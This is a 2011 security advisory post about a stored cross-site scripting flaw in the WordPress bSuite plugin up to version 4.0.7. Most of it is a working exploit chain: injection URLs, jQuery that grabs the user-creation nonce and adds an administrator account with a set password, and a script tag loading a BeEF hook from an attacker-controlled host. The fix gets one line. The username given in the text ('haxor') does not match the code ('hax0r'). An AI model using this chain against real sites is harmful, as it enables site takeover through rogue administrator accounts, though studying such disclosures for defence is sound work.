Categories
Advisories

WordPress bSuite plugin <= 4.0.7 Permanent XSS (Add Admin)

WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin
Download link: http://wordpress.org/extend/plugins/bsuite/
Author contact: 29/06/2011
POC published: 11/07/2011
Plugin is out-of-date, last update on 2009, so this is just a POC that show how to made the XSS more useful 😉

FIX: Add htmlspecialchars to output

Bug found by: IHTeam

Follow us on Twitter! @IHTeam

CHECK BSUITE:
http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js

PERMANENT XSS POC:
You can inject XSS in different way, for example:
http://192.168.1.100/wordpress/?s=<h2>XSSED</h2>
or directly in URL:
http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1>
Now, when admin enter in bSuite panel, will see the XSSED code

XSS TO REMOTE ADMIN ADD:
We will use beef to do that part. So:

  1. Run beef on you local machine
  2. Enable auto-run that code:

jQuery(“<div>”, {
id: “testbeef”
}).appendTo(“#screen-meta-links”);
jQuery.get(“user-new.php”, function(data) {
jQuery(“#testbeef”).html(data);
var nonce=jQuery(“#_wpnonce_create-user”).val();
jQuery(“#testbeef”).html(“”);

jQuery.post(“user-new.php”, {
“_wp_http_referer”: “/wordpress/wp-admin/user-new.php”,
“_wpnonce_create-user”: nonce,
action: “createuser”,
createuser: “Add New User”,
email: “[email protected]”,
first_name: “”,
last_name: “”,
pass1: “123123hello”,
pass2: “123123hello”,
role: “administrator”,
url: “”,
user_login: “hax0r”
});

});

We make 2 request to /wordpress/wp-admin/user-new.php because we need to grab _wpnonce_create-user value.

  1. First create a new div with ID testbeef
  2. Request user-new.php and append content to the DIV
  3. Grab _wpnonce_create-user value to nonce variable
  4. Clean the DIV content;
  5. Make a POST request to user-new.php with the correct values

Review the code to change  _wp_http_referer, pass1, pass2 and user_login of the POST request.
Now it’s time to inject the beef control script in bSuite like this:

http://192.168.1.100/s=<script src=”http://192.168.1.102/beef/hook/beefmagic.js.php”></script>

You may wait 1h to 5h for bSuit refresh. It will result in new admin with username: haxor and password: 123123hello

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.